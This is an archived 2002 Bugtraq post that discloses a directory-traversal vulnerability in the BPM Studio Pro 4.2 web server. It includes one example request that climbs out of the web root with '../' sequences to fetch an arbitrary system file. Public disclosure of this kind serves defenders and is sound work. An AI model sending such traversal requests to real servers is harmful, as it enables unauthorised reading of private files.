BPM STUDIO PRO 4.2 DIRECTORY ESCAPE VULNERABILITY

From: ][-][UNTER (lophtat_private)
Date: Wed Feb 27 2002 - 02:02:34 PST

  • Next message: Valden Longhurst: "Re: BUG: Kmail client DoS"

    Hi bugtraq again...
    
    Now i' ve found another vulnerability in BPM STUDIO PRO 4.2 http server
    implementation.
    
    Anyone can download any file in some host running this software simply like
    performing this http request :
    
    
     http://BPM-HOST/../../../../autoexec.bat
    
    http server is not activated by default...
    
    byes
    
    -----------------------------------------------
                 ][-][UNTER
    Infobyte Security Research Crew
          Buenos Aires, Argentina
    -----------------------------------------------
    



    This archive was generated by hypermail 2b30 : Wed Feb 27 2002 - 20:05:55 PST